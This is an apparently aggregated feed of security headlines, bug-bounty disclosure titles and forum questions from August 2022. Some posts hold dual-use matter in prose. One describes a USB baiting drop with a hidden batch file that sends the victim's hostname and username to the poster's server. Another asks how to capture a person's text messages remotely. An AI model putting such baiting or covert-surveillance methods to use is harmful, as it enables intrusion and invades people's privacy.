    Hello reader, I hope you are doing well. Today I want to talk about one of my findings. It was a public program and the bug is not fixed… Continue reading on Medium »
    ALEX2 Orderbook: Testnet with Bug Bounty rewards and more
    Testnet of a decentralized exchange from the ALEX2 project. Continue reading on Medium »
    How HTML Injection in email got me my first SWAG…
    Namaste!! It’s me yours Aakash Tayal (Spoopyghost) this is my second write-up or we can say first write-up because my first write-up in… Continue reading on Medium »
    Bypassing Multiple 403 Response Type Pages
    Description: Continue reading on Medium »
    Browser Extensions which have landed $$$ !
    What’s up everybody. My name is Sagar Sajeev. Continue reading on Medium »
  • Open

    Practice images
    Hi All. Reaching out to the community to see if you have any references for where to obtain free or cheap mock compromised server/computer/memory images to practice your forensic skills on. I’m a GCFE/GCFA holder but don’t get to directly utilize the level of forensic knowledge that is covered in those classes on a daily basis at work. I don’t want my knowledge and skills to lapse though and would like to practice on some images from time to time to keep those skills fresh. I’m hoping there might be some resources out there that allow for this. Thank you! submitted by /u/Ckn0wt [link] [comments]
    Forensic 4:cast Awards Creation Video
    submitted by /u/Schizophreud [link] [comments]
    TCU Hashtopolis (2022AUG08)
    The latest "TCU Hashtopolis" (2022AUG08) has been released. This live distro automatically initializes the Hashtopolis Linux agent and adds it to your Hashtopolis cluster. This release includes a SSH server (u:user, p:live) so you can login to debug the agent if required which can be particularly helpful when a Hashtopolis task fails to benchmark your agent and the agent pulls itself out of the cluster. It also has hashcat included so if you stop the Passware Linux agent you can use it for direct hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1xkDBNCr-KBg8FTMvTc70sxm0nr-6qYCG?usp=sharing submitted by /u/atdt0 [link] [comments]
    Can anyone recommend best way to capture cell phone text messages remotely?
    I don’t do this often. When I’m asked to I wing it most of the time. We are trying to see if there are options besides going to the person to do the capture. This person has an iPhone. Thanks. submitted by /u/hw60068n [link] [comments]
  • Open

    wtf is security-enabled global group
    Hey folks, I have alerts in my SIEM based on event ID 4728. It seems that there is a similar log, 4732. I understand someone was added to some group in AD, but what is considered "security-enabled" in practice? Do you need to configure it in the settings of the AD object so that it will be considered security-enabled? Is the group automatically considered so when it has some high permission to something? Thanks. submitted by /u/Webly99 [link] [comments]
    Does the US govt really pay for information?
    https://www.bleepingcomputer.com/news/security/us-govt-will-pay-you-10-million-for-info-on-conti-ransomware-members/ Saw that article today and it made me wonder if they really pay. I remember someone said they never do but, I can't remember who. submitted by /u/Chroll-On [link] [comments]
    Partner company requesting we get our client cert for 2-way SSL handshake be signed by a trusted CA. Am I crazy or is that pointless?
    As the title suggests. They asked for a client cert they could trust for 2-way SSL, and when I gave them my self-signed cert they were concerned and said they couldn't accept self-signed certs. I am baffled as to why this is necessary, but before blindly thinking I know best I wanted to ask the community. Are there situations or reasons why this would make sense? submitted by /u/grasponcrypto [link] [comments]
    Dealing with Old Servers
    Any advice for dealing with old servers that can’t be (easily) upgraded for various reasons? We’ve a handful of servers that are running old versions of CentOS and Debian - old old, like Centos 5 and 6 old. Even if Centos as a project hadn’t gone the way of the dodo, these servers wouldn’t be getting security updates any more. The obvious thing to do would be to migrate whatever they’re hosting to new servers and shut off the old ones, but logistically that’s not really a runner - at least not quickly. They’re running old, but still used, PHP applications built on old versions of Zend; updating these applications to work with more recent versions of PHP or retiring them entirely is a work in progress. In the meantime the servers have sometimes hundreds of vulnerabilities each. Any suggestions on what I can do to reduce the attack surfaces in the absence of being able to update/retire them? submitted by /u/deadlock_ie [link] [comments]
    SANS Grad Cert Purple Team Operations vs Cyber Defense Operations
    Hey all! I want to pick your brains on a topic. So, I'm looking into getting a SANS grad cert but it's a toss-up between the two in the title. I have done my research and found that either of these will fit my goal. I can honestly go either way but would like to get insight as to which one would be better over the two. I have around 5 or 6 years of cybersecurity experience and I've held a SOC title before. However, I would like to get more involved in both red/blue team shenanigans when possible lol. My company (thank the stars) is paying for this and I can always take more SANS courses with my education assistance program. So, filling in the blanks on areas I may not know won't be a problem. Now that that is out of the way, I would like to get your thoughts on those cert programs as well as the pros/cons of them. I'm currently waiting on my GCIH material so once I pass that I will be entering one of these programs. I am very interested in having knowledge in pen-testing as well as advanced defenses and techniques. The CDO has courses that are very interesting and the certs I would get out of it are GREAT! and will really fortify my knowledge of hardening and automation. But the purple team has a little bit of both which will help me bridge the gap in some areas I'm weak in right now. (Side note: I wanted to do the pentest path but I'm not ready for that yet. So, I'll just take certs when I can after I complete one of the grad certs lol). Please don't judge, my ADHD brain is all over the place right now hahaha. Hope to get some good feedback and hope that I explained my situation well enough. submitted by /u/StoneyW [link] [comments]
  • Open

    Intelligence and IGR: how companies dealing with the State can improve their decision making
    The private representation of interests before public entities, although a historically recurring fact, has been intensified locally in… Continue reading on Medium »
    ESG and Greenwashing: how to mitigate the risk between suppliers and third parties
    A company commits Greenwashing when it omits or lies about the environmental impacts of its products. Continue reading on Medium »
    Why do you need an ally? — 5 reasons to hire a company to investigate your debtor’s patrimony
    The market dynamics are not always harmonious: while some contracts are successfully closed, others are finished by one of the parties for… Continue reading on Medium »
    How to identify fraud against creditors and recover assets efficiently?
    As is well known, one of the biggest issues in execution proceedings or even in compliance with a court sentence is the creditor’s search… Continue reading on Medium »
    The emergence of OSINT: how news analysis in WW2 influenced open-source search
    In view of the needs that have grown along with the technological advance, the demand for means of obtaining and filtering data for… Continue reading on Medium »
  • Open

    Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER
    submitted by /u/chicksdigthelongrun [link] [comments]
    Security Implications of URL Parsing Differentials
    submitted by /u/monoimpact [link] [comments]
    capa v4: casting a wider .NET
    submitted by /u/sanitybit [link] [comments]
    Researching TEE payment system built into Xiaomi smartphones powered by MediaTek
    submitted by /u/sanitybit [link] [comments]
    DNSMonitor leverages Apple's Network Extension Framework to monitor DNS requests and responses
    submitted by /u/sanitybit [link] [comments]
    The cloud has an isolation problem: PostgreSQL vulnerabilities affect multiple cloud vendors | Wiz Blog
    submitted by /u/juken [link] [comments]
    What Happened to Lapsus$
    submitted by /u/TravenDev [link] [comments]
  • Open

    Useful redteam github links
    https://github.com/A0RX/Red-Blueteam-party https://github.com/MantisSTS/RedTeamTools https://github.com/idchoppers/redTeaming https://github.com/irredteam/irredteam.github.io https://github.com/0xMrNiko/Awesome-Red-Teaming https://github.com/J0hnbX/RedTeam-Resources submitted by /u/ff6764 [link] [comments]
    Wifi Traffic Analysis in Wireshark
    submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-08-12 Review
    The Ten Most Noteworthy Talks at Black Hat 2022 by ourren; On the Nature of Offense-Defense Confrontation in Security by ourren; Attack-Defense Exercises from a Cloud Sandbox Perspective: A Summary of Sample-Based Attack Techniques by ourren; Data Security in Intelligent Systems by ourren; A Beginner's Guide to Selenium Automation by ourren; A Brief Discussion of NFTs, Web3 and the Metaverse by ourren; DevOps Risk Mapping: The Code Chapter by ourren; The Term "Data-Free Knowledge Distillation" by ourren. For more of the latest articles, visit SecWiki
  • Open

    Help executing the PoC for CVE-2022-22582
    Ok so I'm trying to execute the CVE that I referenced on my local Mac (version 11.6.1). I've looked at the original PoC at http://www.github.com/poizon-box/CVE-2022-22582. This doesn't produce any errors, but the exploit is supposed to take advantage of symlinks to overwrite privileged files, and I don't understand how that's supposed to work. If you could help me it would be very appreciated. submitted by /u/GuillotineNamedJEff [link] [comments]
    Linux kernel exploitation series (if you know Japanese or trust Google translate)
    submitted by /u/0xor0ne [link] [comments]
  • Open

    Reflected XSS at https://stories.showmax.com/wp-content/themes/theme-internal_ss/blocks/ajax/a.php via `ss_country_filter` param
    Showmax disclosed a bug submitted by miron666: https://hackerone.com/reports/1663202 - Bounty: $150
  • Open

    CVE-2020–15139: From Self-XSS to Persistent DOM-XSS
    My journey into discovering CVE-2020–15139 Continue reading on Medium »
  • Open

    From an App to Getting a Shell: One Experience
    During an authorized penetration test, the stated goal was to obtain privileges or key user data.
    何艺: Confessions of an Enterprise-Side Security Entrepreneur
    持安科技 founder and CEO 何艺 was invited to the conference and presented "Confessions of an Enterprise-Side Security Entrepreneur"
    Database Injection Privilege Escalation Summary (Part 4)
    A permission is a user's right to execute a given function.
    A Usage Guide for wget with Chinese National (SM) Cryptography Support
    wget is a free tool developed by GNU for automatically downloading files from the network.
    Enterprise Data Security Governance 1+3+1+1
    Enterprise data security governance is a sprawling and heavy undertaking, and it is especially challenging given how tightly data security is coupled with network security and application security; it needs to be considered as a whole.
    2022 Global Cyber Threat Report
    Source: Acronis. Authors: Alexander Ivanyuk (Senior Director of Product and Technology Positioning, Acronis) and Candid Wuest (Vice President of Cyber Protection Research, Acronis). Contents: Introduction and summary; Part 1: Major cyber threats and trends in 2021; Part 2: Common malware threats; Part 3: Vulnerabilities in the Windows operating system and software; Part 4: Security predictions for 2022; Part 5: Acronis's recommendations on how to stay secure in the current and future threat environment…
    Banking trojan SOVA is back and may launch ransomware attacks
    The Android banking trojan SOVA has returned with many more new features than before, and may even carry out ransomware attacks.
    US offers $10 million reward for information on Conti members
    The US State Department today announced a $10 million reward for information on five senior members of the Conti ransomware group.
    $540 million involved: cybercriminals are laundering money through the RenBridge cross-chain platform
    The platform allows assets to be moved seamlessly between different blockchain networks, for example converting Bitcoin onto the Ethereum blockchain.
  • Open

    What is Fuzz Testing? Definition, History, Uses and Importance.
    Sometimes, software security seems to be created with a loophole for attackers to exploit, various ways to manage such vulnerabilities… Continue reading on Medium »
  • Open

    Configuring TOR with Python
    No content preview
    Let’s Learn API Security: More about Excessive Data Exposure
    We are going to talk about “Excessive Data Exposure” in this post that we are making for API Security. Continue reading on InfoSec Write-ups »
  • Open

    New Vulnerability Affects All AMD Zen CPUs: Threading May Need to Be Disabled
    Article URL: https://www.tomshardware.com/news/new-vulnerability-affects-all-amd-zen-cpus Comments URL: https://news.ycombinator.com/item?id=32434119 Points: 3 # Comments: 1

  • Open

    Sketchy colleague stuck a non-work-related USB drive in my work macbook without my consent and pulled it out before I could see what he was doing, what should I look out for/include in my report to T&S?
    I'm not in netsec myself. A shady colleague recently asked me if he could "check something" on a macbook I use at work. I asked what it was and he said it was photos related to his side-gig (artist). I said "No, I'm not comfortable with that, why not check it on your own laptop?", but I wasn't standing close enough to my desk to physically stop him. He said "It'll just take a minute" and stuck a USB drive in my macbook. 100% my fault for leaving it unlocked; I was literally 3 feet away on the other side of a half-height cubicle wall helping a colleague with a question at their desk, and I should know better. As soon as I saw him stick the drive in I walked back toward my desk; when I got close enough to see the screen he yanked it out and said "That's all I needed, thanks" and walked away. I plan on contacting our trust & safety team, but because of this colleague's position they will see the report at the same time the T&S team does, and because of previous experiences with this colleague I fully expect that (a) there was something malicious on the drive and (b) they'll start working on a cover story immediately after I send my report. What can I look for as evidence that something malicious happened (if something malicious did actually happen) before reporting it, so that it can be included in the report, and minimize their time to come up with a cover story for anything objectionable they did? For all I know it was innocent (just checking color profiles of some photographed works on a retina screen or something? idk) but given the fact that I asked him not to and he did anyway (as well as past experience with this guy) I'm suspicious. e: I know virtually nothing about macs, just have to use one at work. submitted by /u/No_Manufacturer_4701 [link] [comments]
    Powershell relevance
    I've rare time off and am going through a backlog of redteam trainings/materials/posts/talks and blogposts. I notice a lot of Powersploit or Powershell C2s, especially on blogs. Those ones I understand, as usually they're from individuals who don't have an entity bankrolling expensive toolsets. I am also aware that PSH has been quite thoroughly swisscheesed by blueteamers these days. I'm thinking it's rather irrelevant to do anything with PSH materials; based on my experience using Cobalt Strike we're reliant on BOFs and .NET assemblies, especially to evade sophisticated AV/EDRs. But I've not worked in enough variety of shops yet. Though many moons ago I listened to a 10minSecurity (or might've been called 7minSecurity) podcast where it seemed like they used such tools at a commercial firm. Although, iirc, it also seemed like the owner was newly getting this firm up and new in the pentesting/teaming space, which is why he might have been using such tooling. TLDR: Not sure if it is worth going through these Powersploit/Empire/other PSH-centered tools still? Also I've never done a NCCDC but might do one in the future for shits and giggles. Is it PSH tooling they use? submitted by /u/blabbities [link] [comments]
    Monitored SOC/SIEM Questions
    Hi all, We're currently reviewing a number of solutions for a monitored SOC/SIEM. This is relatively new to me so I'm just attending meetings with my managers and vendors just for the experience. We're a small one-site business, 150+ userbase, mostly Windows on prem/Azure/M365 and a firewall and VPN (which is our main tool for remote work). I am wondering if there's anything in particular I should watch out for during the meetings? Is there a list of features or requirements that would be almost standard? submitted by /u/DaithiG [link] [comments]
    Media Drop / Baiting attack with USB Drive
    Hey guys, I'm working on creating a media drop off / baiting USB drive. Goal: Create a USB stick to drop it in the parking lot, at the reception or at a desk, bait the user to insert it into a computer and click on the contents, calling to my server to know they clicked. Current plan and try: I created a file called windows.bat on the drive, which is set to be hidden. The batch file basically does a curl to a specified endpoint (a server I control, allowing me to know they opened it), which after that outputs some troll stuff, so the employee knows they got tricked. That endpoint also includes the output of "hostname" and "whoami", so I know who it was that clicked on it. I then created some shortcuts like "Private" (with a folder as symbol) or "Vacation-Photos of Monica" or "Tax-Report 2021" etc., that all point to that batch file. Besides the fact that they have the shortcut arrow symbol, it looks "authentic enough" for most employees probably. The problem: those shortcuts include the drive letter, which varies from device to device. So like this, it won't work. I thought about whether it's possible to use relative paths for the shortcut, but this doesn't seem to be too easy in Windows (or basically not possible at all). Do you guys have any other idea on how to get this working? The only thing that "the opened file" has to do is somehow access this endpoint, and the user should be somehow baited into clicking and opening this tempting-looking file. submitted by /u/namelessOnReddit_ [link] [comments]
    Audio Steganography: what kind of method might have been used?
    Waveform image of a part of the audio: https://imgur.com/a/x2pkEj7 submitted by /u/AlternativeResult448 [link] [comments]
    Web-based Pcap Viewers
    I’m doing some research and want to hear what NetSec folks think of services like CloudShark and apackets.com which let you upload pcap files and analyze them. Do you use any online services to view pcap files? If not, is sending traffic captures to a third-party the biggest concern? submitted by /u/codebyamir [link] [comments]
    Why would an attacker send GET requests for NSFW/porn websites from external IPs into the victim’s DMZ when they have nothing to do with that kind of content?
    The host field contains porn sites, but the destination IP is the victim company. submitted by /u/Free-Roaming-Orange [link] [comments]
  • Open

    Disabling context isolation, nodeIntegrationInSubFrames using an unauthorised frame.
    Internet Bug Bounty disclosed a bug submitted by s1r1u5: https://hackerone.com/reports/1647287 - Bounty: $2400
    Admin panel Exposure without credential at https://plus-website.shopifycloud.com/admin.php
    Shopify disclosed a bug submitted by 0x50d: https://hackerone.com/reports/1417288 - Bounty: $2900
    Wordpress Users Disclosure (/wp-json/wp/v2/users/)
    Top Echelon Software disclosed a bug submitted by hammodmt: https://hackerone.com/reports/1663363
    fix(security):Path Traversal Bug
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1664244
    Disable xmlrpc.php file
    Top Echelon Software disclosed a bug submitted by sohelahmed786: https://hackerone.com/reports/712321
    Redirection in Repeater & Intruder Tab
    PortSwigger Web Security disclosed a bug submitted by mr_vrush: https://hackerone.com/reports/1541301 - Bounty: $150
  • Open

    Researchers Find Vulnerability in Software Underlying Discord, Microsoft Teams
    Article URL: https://www.vice.com/en/article/m7gb7y/researchers-find-vulnerability-in-software-underlying-discord-microsoft-teams-and-other-apps Comments URL: https://news.ycombinator.com/item?id=32430582 Points: 1 # Comments: 0
    Baton Drop (CVE-2022-21894): Secure Boot Security Feature Bypass Vulnerability
    Article URL: https://github.com/Wack0/CVE-2022-21894 Comments URL: https://news.ycombinator.com/item?id=32429156 Points: 4 # Comments: 0
    Stats say Chinese researchers are not deterred by China's vulnerability law
    Article URL: https://www.scmagazine.com/editorial/analysis/compliance/stats-say-chinese-researchers-are-not-deterred-by-chinas-vulnerability-law Comments URL: https://news.ycombinator.com/item?id=32423207 Points: 2 # Comments: 0
  • Open

    Fully dockerized Linux kernel debugging environment
    submitted by /u/0x00rick [link] [comments]
    Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study – NCC Group Research
    submitted by /u/digicat [link] [comments]
    Hunting for Low and Slow Password Sprays Using Machine Learning (ML Deep Dive)
    submitted by /u/SCI_Rusher [link] [comments]
    Concealed code execution: Techniques and detection
    submitted by /u/darronofsky [link] [comments]
    Enhancing Subdomain Enumeration - ENTs and NOERROR
    submitted by /u/doitsukara [link] [comments]
    A deep dive into an in-the-wild Android exploit: the quantum state of Linux kernel garbage collection - CVE-2021-0920 (Part 1)
    submitted by /u/sanitybit [link] [comments]
  • Open

    Getting started with Cyber Security
    A complete roadmap for young computer security aspirants Continue reading on Medium »
    ALEX2 Orderbook: Testnet with Bug Bounty rewards and more
    Testnet of the decentralized exchange from the ALEX2 project Continue reading on Medium »
    JWT None Attack! What is it? And why does it occur?
    Everyone has probably seen the JWT (JSON Web Token) token, normally used for authentication in SSO (Single Sign-On). The JWT is made to… Continue reading on Medium »
    Improper Cache Control Vulnerability
    Hello everyone🎉 !!! I hope you all are doing well. Continue reading on Medium »
    My Experience on Hacking the Dutch Government
    Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government… Continue reading on Medium »
  • Open

    The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)
    Article URL: https://googleprojectzero.blogspot.com/2022/08/the-quantum-state-of-linux-kernel.html Comments URL: https://news.ycombinator.com/item?id=32420147 Points: 2 # Comments: 0
  • Open

    How to OSINT Russia? (even if you don’t speak Russian). Part 1 -Starter Pack
    Since the Russian invasion of Ukraine, the attention of OSINTers took a sharp turn east. A large number of “expert” accounts emerged on… Continue reading on Medium »
  • Open

    My Journey: From Pentest to Red Team to Blue
    I was a web application developer in 2010 when I learned about pentesting. I fell in love with the idea that I could get paid to break… Continue reading on Walmart Global Tech Blog »
    Find command for CTF players/ Penetration testers.
    The find command is among the most useful tools in the arsenal of Linux system administrators. The find command searches a directory… Continue reading on System Weakness »
  • Open

    SecWiki News 2022-08-11 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    PortSwigger Web Security Lab: SQL injection UNION attack, determining the number of columns…
    No content preview
    Hacker101 CTF — Micro CMS v1 Flag 0
    No content preview
    Phoenix Challenges — Stack Zero
    No content preview
  • Open

    Breaking! Midea rumored to have been hit by a ransomware attack
    Midea Group is rumored to have suffered a ransomware attack: computers in several parts of its factories were infected with ransomware, the intranet systems could not be reached, and no files could be opened.
    New trend: hackers-for-hire become a business
    Cybercrime has entered a new era; hackers no longer launch attacks merely for the thrill.
    Sophos: three ransomware gangs found attacking the same network in succession for the first time
    Sophos X-Ops reported that an automotive supplier's systems were breached by three different ransomware gangs within two weeks in May.
    FreeBuf Weekly | Cisco confirms ransomware attack; 7-Eleven stores in Denmark closed due to cyberattack
    Happy weekend, Buffers! Here is this week's FreeBuf Weekly!
    Gartner releases the 2022 Hype Cycle for Emerging Technologies
    Evolving/expanding immersive experiences, accelerating AI automation, and optimizing technologist delivery.
    FreeBuf Morning Report | New dark web market claims ties to a criminal cartel; Cisco hacked by the Yanluowang ransomware gang
    An automotive supplier's systems were compromised by three different ransomware gangs within two weeks in May, and its files were encrypted.
    Cisco confirms ransomware attack, 2.8GB of data leaked
    Cisco confirmed that the Yanluowang ransomware group breached the company network in late May this year, and the attackers attempted to extort a ransom by threatening to leak the stolen data.
    An in-depth investigation reveals the story behind phishing emails
    Join us in exploring "the story behind phishing emails" and decoding the astonishing tricks hidden behind them.
    Former Twitter employee faces up to 20 years in prison for espionage
    For stealing private information about Twitter users and handing the data to the Saudi Arabian government, US citizen Ahmad Abouammo faces up to 20 years in prison.
  • Open

    SD card locked/decrypted?
    I have a noname SD card that comes from a car navigation system and it contains a lot of data. It is possible to get the data by connecting the card to the navigation system and to a computer at the same time. This way, the navigation system seems to unlock the card and it gets mounted by my computer. I would prefer not to use the navigation system in this process, but when I connect the card to my computer only, I can't access it. There is just a generic SCSI driver available. Do you know anything like this? Is it possible to "lock" or encrypt the SD card? submitted by /u/Knuust [link] [comments]
  • Open

    [Open Proxy Project] 400+ Verified Proxies every 15 minutes!
    A collection of aggregated open proxies across the internet, cross-examined and maintained every 15 minutes via automation. Link: https://Oproxy.ml Source Code: https://github.com/midhunvnadh/Open-Proxy-Project https://preview.redd.it/zib9r1kp93h91.png?width=1280&format=png&auto=webp&s=e5c9a464a4151d5028340346f2198737f55938cd submitted by /u/MidhunVNadh [link] [comments]
  • Open

    Researching the Windows Registry
    The Windows Registry is a magical place that I love to research because there's always something new and fun to find, and apply to detections and DFIR analysis! Some of my recent research topics have included default behaviors with respect to running macros in Office documents downloaded from the Internet, default settings for mounting ISO/IMG files, as well as how to go about enabling RDP account lockouts based on failed login attempts.  Not long ago I ran across some settings specific to nested VHD files, and thought, well...okay, I've seen virtual machines installed on systems during incidents, as a means of defense evasion, and VHD/VHDX files are one such resource. Further, they don't require another application, like VMWare or VirtualBox. Digging a bit further, I found this MS documen…

  • Open

    How Cisco got hacked - insights on what the attackers did
    submitted by /u/jwizq [link] [comments]
    AWSGoat is a vulnerable by design infrastructure on AWS featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfigured AWS services.
    submitted by /u/sanitybit [link] [comments]
    Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling
    submitted by /u/Fugitif [link] [comments]
    Cryptominer detection: a Machine Learning approach
    submitted by /u/MiguelHzBz [link] [comments]
    DeathStalker’s continuous strike at foreign and cryptocurrency exchanges
    submitted by /u/EspoJ [link] [comments]
    BlueHound combines information about user permissions, network access and unpatched vulnerabilities to reveal the paths attackers would take if they were inside your network.
    submitted by /u/sanitybit [link] [comments]
    PowerHuntShares is designed to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers
    submitted by /u/sanitybit [link] [comments]
    ÆPIC Leak: Intel CPU bug able to architecturally disclose sensitive data
    submitted by /u/sanitybit [link] [comments]
    A Novel SIP Based Distributed Reflection Denial-of-Service Attack and an Effective Defense Mechanism
    submitted by /u/sanitybit [link] [comments]
    Everything In Its Right Place - Part 2
    submitted by /u/Gallus [link] [comments]
    From Shared Dash to Root Bash :: Pre-Authenticated RCE in VMWare vRealize Operations Manager
    submitted by /u/Gallus [link] [comments]
  • Open

    How I earned a $6000 bug bounty from Cloudflare
    Introduction: Continue reading on Medium »
    Defeat the HttpOnly flag to achieve Account Takeover | RXSS
    Hello folks, I’m Mohamed Tarek aka Timooon at Bugcrowd and HackerOne, In this write up I will explain how I get the victim’s session when… Continue reading on Medium »
    Email Confirmation bypass at Instagram
    This story is all about a logical vulnerability which helped me in Bypassing the email confirmation process and adding any arbitrary… Continue reading on Medium »
    403 Forbidden Bypass Leading to Admin Endpoint Access.
    Hi everyone! This is my first write-up, pardon me for any mistakes. I’ll share my tip with everyone how I was able to bypass a 403… Continue reading on Medium »
    Enhancing Subdomain Enumeration — ENTs and NOERROR
    Identifying subdomains more reliably by checking DNS status codes and empty nodes Continue reading on SSE Blog »
    Stealing Gas From dYdX, 0.5 ETH A Day
    Gas is liquid gold. Back in February 2022, we found a way to abuse a feature called “Gasless Deposits” on dYdX exchange that could allow… Continue reading on Medium »
    Tudo (na verdade o básico) sobre Directory Traversal [PT/BR]
    Hoje eu resolvi fazer um pouco diferente, normalmente eu tenho mais o hábito de escrever sobre write-ups do que sobre as vulnerabilidades… Continue reading on Medium »
  • Open

    OSSIM Python Boolean Expression
    I am trying to get ossim to send me an email when a specific file is accessed. I have already set everything up so that OSSIM will send me an email when a file is accessed BUT I am trying to make it more granular to send an email when a specific file is accessed. Currently in Define Logical Condition I have PBE: FILENAME == "D:\Depts\Shared\test.txt" This does not trigger an email when I open the file. I can see in the event logs that the event is there and if I delete out the PBE and set condition to ANY, I will receive an email after opening this file. Any suggestions? I have tried different spacing, caps/no caps, etc. It appears to work on my other Actions when I filter by specific usernames, but not for FILENAME. submitted by /u/Sufficient-Bed2280 [link] [comments]
    I change everything but again Instagram detects me !!!!
    Hi guys, I changed my device, my public dynamic IP, username, password, email, browser, app, cookies, and everything, and again Instagram knows it's me. My question is: do you know whether IG can spot that public dynamic IPs are coming from the same person, or do they know me another way? (Because in this case I used a proxy and the problem was solved, though the dynamic IP didn't help.) I know of device fingerprinting, but because I changed everything I don't think it's the case. This case only affects me, not people in my region, so it's not related to geolocation, which is rough and not exact. What Instagram does is illegal in this case, considering it is tracking this way without the knowledge of the user. submitted by /u/amir_hossein0001 [link] [comments]
    Is Fortinet considered a high risk VPN?
    Our company cyber security insurance identified Fortinet Fortigate VPN as a high risk due to "numerous critical code exploits". Instead they are pushing Zscaler or other ZTNA solution. submitted by /u/brainstormer77 [link] [comments]
    How secure is TCG Opal 2.0?
    I found various sources that claim that TCG Opal isn't really secure compared to something like LUKS/dm-crypt encryption (for example this video), but I don't seem to fully understand under what circumstances that is actually true. It looks like the standard itself isn't the problem, but rather the implementation of the SSD manufacturers. Is that true and how "dangerous" would it be to only use that encryption on a modern laptop with one of the latest SSDs and a standard threat level? Hope this is the right sub & thx in advance. submitted by /u/-_----_-- [link] [comments]
    safe to reset and use a phone found in a house clearance?
    Hi, looking for advice. I got a phone from a house clearance; everything in the house was going to the trash anyway, ready for a new tenant to move in. The phone's not amazing but it's better than my current one. Just wondering if resetting it would remove any potential weird things like tracking/spying software? Just got me a bit paranoid that the house was weird and full of other phones and watches... I got the feeling a drug dealer may have lived there previously. But wondering if resetting this phone will make it safe to use? It's a Samsung. submitted by /u/Spliceofcake [link] [comments]
    Viewing Thycotic secrets
    Is there a way to log when a user views only their own password/secrets? or when a user views any password in general ? submitted by /u/No_Cranberry_2292 [link] [comments]
    Fake positive Golden Ticket Tenable.ad
    Hello everyone, I have a question for people who have Tenable.ad in their infrastructure. We have had some Golden Ticket feedback from our Tenable.AD tool. As a precaution, we shut down our infrastructure for security reasons before reopening it. According to our initial analysis, this could be a false positive alert. Have you ever had this on your Tenable.ad? If so, through what means? Through authentication on a server? A machine account (ex: hostname$)? Thanks a lot for your help :) submitted by /u/Captain_AdamBzh [link] [comments]
    How do you check the real IP hosting server hidden behind Cloudflare?
    I have read this blog generally talking about the hidden IP address of a deepfake pornography website owner who victimized over 190 Kpop idols. https://blog.criminalip.io/2022/08/04/deepfake-porn-site/ They said they can find the real IP hidden behind Cloudflare using nslookup. But they ended in a vague sense. Can anybody tell me specifically how to check the real IP that is hidden by a VPN, proxy, Cloudflare, etc.? I really want and need more details on this... thanks! submitted by /u/Glad_Living3908 [link] [comments]
  • Open

    Exchange/Azure AD pen testing resources. Any tips or good articles about this?
    submitted by /u/One_Appeal_4080 [link] [comments]
    Advice for 2nd Interview for Red Team Internship
    The qualifications for the internship: Has or is pursuing all of the following -pursuing a relevant bachelor's degree -good communication skills, can work within a team and meet deadlines -basic knowledge of network protocols My first interview wasn't a technical interview. The interviewer just asked me basic questions about myself to get to know me and why I wanted to intern at their company specifically. She informed me that the second interview will be done by three people: two security consultants from their red team and a manager of business solutions. To give some insight as to what the internship will be like, during my first interview I asked my interviewer what to expect to be doing day to day. She told me I would be working alongside the red team on their current project. I would also work on the helpdesk a little. And I would get to work with the business consulting team as well to see how they meet with clients. This is all to try to give me different aspects of what their company does and give me solid hands-on experience. She did say primarily though that the internship focuses on working with the red team. My question is what should I expect from the second interview? Are they expecting me to be able to answer technical questions about pentesting? I have some experience doing CTFs. I am by no means a master at them but I have been doing them every day to try to learn more and improve. Any questions that I should expect to see so I can prepare for them? Any advice would be appreciated! Thank you in advance! submitted by /u/tyllanth [link] [comments]
  • Open

    BlueSky Ransomware: Fast Encryption via Multithreading
    BlueSky ransomware is an emerging family that has adopted modern techniques to evade security defenses. Read our technical analysis. The post BlueSky Ransomware: Fast Encryption via Multithreading appeared first on Unit 42.
  • Open

    Sisyphus and the CVE Feed: Vulnerability Management at Scale
    Article URL: https://medium.com/airbnb-engineering/sisyphus-and-the-cve-feed-vulnerability-management-at-scale-e2749f86a7a4 Comments URL: https://news.ycombinator.com/item?id=32415629 Points: 1 # Comments: 0
  • Open

    Hacker101 CTF — Travial CTF Flag 0
    No content preview
    Car Hacking: Cyber Security in Automotive Industry
    No content preview
    Write-up: Pickle Rick @ TryHackMe
    No content preview
    Hunting webshell with NeoPI
    No content preview
    RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    IIot, Operational Technology Cybersecurity Challenges
    No content preview
  • Open

    SecWiki News 2022-08-10 Review
    [HTB] Apocalyst Writeup by 0x584a For more of the latest articles, visit SecWiki
  • Open

    Why Is Automotive Cybersecurity So Important?
    What is automotive cybersecurity? Continue reading on Medium »
  • Open

    "Borrowing, crossing borders…"
    (A short reflection for an OSINT-addicted summer) Continue reading on Medium »
  • Open

    Log analysis practice tool
    Hey everybody. I am looking for something that could help me improve my forensic skills. The idea is that there is a case, I can view some logs and I have to tell what happened and whether the machine was compromised or not. After looking through the logs I can check the answer. Any ideas if there is something like that online? Thanks! submitted by /u/Full-Plankton-7607 [link] [comments]
    UFED 4PC and OPPO A54 5G problem
    Hi All, I found a problem in the acquisition of an OPPO A54 5G with UFED 4PC. I tried Advanced Logical and Android Backup. I use the dongle and set up the smartphone as directed by UFED (USB debugging, allow app, always on); however, the extraction always fails. Normally, at the beginning of an acquisition, the PC authorization request appears on the smartphone, but in this case it did not happen. I think this is the problem. Has this ever happened to anyone? What to do in this case? Thanks! submitted by /u/Max_Steiner [link] [comments]
    Which software to make a preview of computer's hard disk?
    Hi all, I need to find the correct way to make a preview of a computer's hard disk that allows me to see the files inside it like EnCase would. I start the PC with a Linux live USB. I can use Kali, Caine, Backbox or Tsurugi; these guarantee me that the disks are write protected. At this point, without creating a disk image, which software in these Linux distros can I use to preview the hard disk like EnCase? thanks! submitted by /u/Max_Steiner [link] [comments]
    Cellebrite update disabled all USB ports.
